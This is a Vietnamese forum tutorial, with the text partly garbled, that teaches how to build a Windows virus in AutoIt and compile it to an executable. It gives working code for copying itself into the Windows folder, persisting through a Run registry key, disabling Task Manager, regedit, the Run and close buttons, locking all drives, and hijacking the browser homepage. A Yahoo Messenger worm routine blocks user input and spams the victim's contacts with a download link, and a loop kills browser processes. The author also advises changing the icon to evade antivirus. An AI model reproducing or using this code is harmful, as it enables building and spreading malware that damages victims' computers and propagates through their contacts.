Lm virus = autoit (hng dn y ) u tin cc bn phi down chng trnh v ti y AutoIt Script Home Page Link direct: http://www.autoitscript.com/cgi-bin/...t-v3-setup.

exe *Ch : +Khi edit 1 mt con virus bt buc phi nhn phi chut ri nhn edit script, ch nu nhn chut tri nh bnh thng l bn s t dnh con virus m bn lm ra +Khng nn kim ebook autoit v n k hu dng cho bn u, nu mun hc su v rng hn th bn bt buc phi c trong file help ca chng trnh +Nu c coppy bi ny th nh ghi bi vit ny ca marryme babu.vn ==" +Icon ca chng trnh bt buc k c mc nh v cc trnh virus s pht hin +Cc lnh mnh s lm ni ln Ai cn source code ca 1 con virus th pm trong babu ^^ Bt u: Chiu mi ngi nn mnh post hnh lun ><" Bc 1: Coppy cc code t babu

Bc 2: To 1 file au3

Bc 3:Edit scirpt

Bc 4aste code vo

Bc 5:Convert file au3 --> exe (ci ny quan trng)

Nu y l ln u tin bn convert file au3 --> exe th phi lm theo cc bc , nhng v sau bn ch cn nhn phi cht vo file au3 v nhn compile script l file exe s compile ngay ti th mc cha file au3 ^^ Lnh u tin m bt buc con virus = autoit no cng phi c: #Notrayicon ---> k hin chng trnh khay icon FileCopy(@ScriptDir & "\******.exe","C:\WINDOWS",1) ---> "*****" s l tn virus m bn to con autoit ny, lnh ny dng kt hp vi lnh k tip Lnh khc phc: FileDelete("C:\Windows\*****.exe") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run","explorer","REG_SZ",@Win dowsDir & "\*****.exe") ---> **** s l tn chng trnh, lnh ny dng khi ng virus mi khi my tnh c

bt ln, v ch dng c khi c lnh trn Lnh khc phc: RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Run","explorer") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System","DisableTaskM gr","REG_DWORD","1") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\System","DisableTask Mgr","REG_DWORD","1") ----> lnh ny s gip con virus ca bn kha taskmanager ca my tnh Lnh khc phc: RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\System","DisableTask Mgr") RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\System","DisableTas kMgr") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System","DisableRegis tryTools","REG_DWORD","1") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\System","DisableRegi stryTools","REG_DWORD","1") ----> lnh ny s gip con virus ca bn kha regedit ca my tnh Lnh khc phc: RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\System","DisableRegi stryTools") RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\System","DisableReg istryTools") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoRun","R EG_DWORD","1") ----> lnh ny s gip lm mt nt run trong windows Lnh khc phc: RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\Explorer","NoRun") RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel","Homepage","REG_DWORD","kick_bay_gio@yahoo. com.vn") RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel","Homepage","REG_DWORD","1") ----> lnh ny s gip bn thay i homepage ca IE, y mnh change homepage li l kick_bay_gio@yahoo.com.vn ^^" RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win

dows\CurrentVersion\Policies\Explorer","NoViewOnDr ive","REG_DWORD","67108863") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoViewOnD rive","REG_DWORD","67108863") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\Explorer","NoDrives", "REG_DWORD","67108863") RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoDrives" ,"REG_DWORD","67108863 ") ----> lnh ny gip bn kha a ca ngi khc, k cho truy cp vo a, "67108863" ---> l thng s kha tt c cc a Lnh khc phc: RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoViewOnD rive") RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\Explorer","NoViewOn Drive") RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoDrives" ) RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\W indows\CurrentVersion\Policies\Explorer","NoDrives ") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\Explorer","NoClose"," REG_DWORD","1") ---> lnh ny lm mt nt close mi chng trinh (bt ln l k th tt c (O_o) Lnh khc phc: RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\CurrentVersion\Policies\Explorer","NoClose") Lnh reset my: Shutdown(thng s) Cc thng s c th c l +0: i user (hay thng gi l log off) +1: Tt my (shutdown) +2: reset my(restart) +4: Force +8: Power down +32: Stanby +64: Hibernate VD: Shutdown(2) ---> reset my Lnh i, dng: Sleep(seconds) VD: Sleep(3000) ---> Dng 3 giy

Cch pht tn trn yahoo (ht nht ^^) Dim $tin[10] -----> $tin[so] So: s y l s tin nhn m bn mung gi trong yahoo $tin[0] ="marryme " ------> bn t li nhn vo trong du ngoc kp + link down virus ^^" $tin[1] ="vip" $tin[2] =" nhut" $tin[3] =" babu" $tin[4] =" ...." $tin[5] =" ...." $tin[6] ="...... " $tin[7] ="..... " $tin[8] ="..... " $tin[9] ="...... " $tieude = WinGetTitle("Yahoo! Messenger","") $kiemtra = WinExists ($tieude) While 1 If $kiemtra = 1 Then $ngaunhien = Random(0,9,1) Sleep(2500) ClipPut($tin[$ngaunhien]) BlockInput (1) WinActivate($tieude) Send("!m") Send("un") Send("^v {ENTER}{ENTER}") Send("^m") Send("{DOWN}") Send("^{SHIFTDOWN}{END}{SHIFTUP}") Send("{ENTER}") Send("^v {ENTER}") BlockInput (0) EndIf Lnh k cho m 1 chng trnh bt k (ch cn bit tn process ca chng trnh ) While 1 If ProcessExists("iexplorer.exe") then ProcessClose("iexplorer.exe") EndIf If ProcessExists("firefox.exe") then ProcessClose("firefox.exe") EndIf WEnd ----> VD: If ProcessExists("iexplorer.exe") then ---> khi my tnh m file iexplorer (IE) ProcessClose("iexplorer.exe") --> ng ngay lp tc EndIf